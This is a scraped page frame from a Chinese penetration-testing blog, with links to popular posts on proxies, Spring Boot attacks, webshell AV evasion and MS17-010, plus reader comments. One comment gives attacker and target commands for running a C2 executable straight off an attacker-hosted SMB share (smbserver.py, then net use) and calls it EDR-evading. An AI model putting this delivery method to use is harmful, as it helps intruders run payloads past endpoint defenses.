AabyssZG's Blog

首页关于我友链

推荐

渊龙Sec安全团队

1 渗透必备：使用Proxifier玩转代理 26,659 阅读 2 对于Spring Boot的渗透姿势 14,326 阅读 3 HaE入门到精通：三条影响你一生的HaE规则 13,391 阅读 4 PHP从零学习到Webshell免杀手册 7,558 阅读 5 避坑：Win10环境MS17-010漏洞复现过程 7,189 阅读

生活感悟渗透姿势技术随笔 CTF夺旗赛

登录

标签搜索

技术随笔
技术小记
渗透经验
人生小记
CTF
数据库
年末总结
内网渗透

曾哥

累计撰写 36 篇文章
累计收到 288 条评论

首页
栏目
页面
- 关于我
- 友链
推荐
- 渊龙Sec安全团队

26,659 ℃
渗透必备：使用Proxifier玩转代理
14,326 ℃
对于Spring Boot的渗透姿势
13,391 ℃
HaE入门到精通：三条影响你一生的HaE规则
7,558 ℃
PHP从零学习到Webshell免杀手册

最新文章
热门文章
评论最多
点赞最多

欢迎加入黑暗の大门QQ群

查看更多

曾哥

36 文章数

288 评论量

SQL注入恶劣环境之可执行文件上传骚姿势
当无回显RCE碰上Win服务器
2023成都CCS大会&&补天城市沙龙有感

人生倒计时

最新回复

逻辑
2026-01-07

好的，学到了。最近又学到了一种新的利用方式，对AV甚至EDR都很友好，直接利用smb协议，也是无文件直接执行。想必你肯定用不少了。# 攻击机，开始 smb server sudo smbserver.py share -smb2support $(pwd) -user test -password test# target machine net use n: \\\share /user:test testn:\C2可执行文件名.exe
Mr. xin
2025-12-26

挺详细的, good job. 我一般是先收集个大概. 然后勉强够用就行,然后如果后面哪个步骤卡住了再回过头重新收集,就这样不停迭代. 因为我觉得第一次收集太多了有点被动, 有时候不知道用到哪. 如果详细做好各种笔记, 那第一次收集详细也更好吧.说到笔记,曾哥推荐几个综合评分都很好的笔记软件吧. 特别适用于安全行业的.
·1
2025-12-16

# 图片回复
SYNscan
2025-12-07

感谢分享很有用
风风
2025-12-01

想问一下曾哥那款机器人社工工具怎么下载

标签云

2022 - 2032 © Reach - AabyssZG 浙ICP备20003630号-3

已运行 00 天 00 时 00 分 00 秒

RSS MAP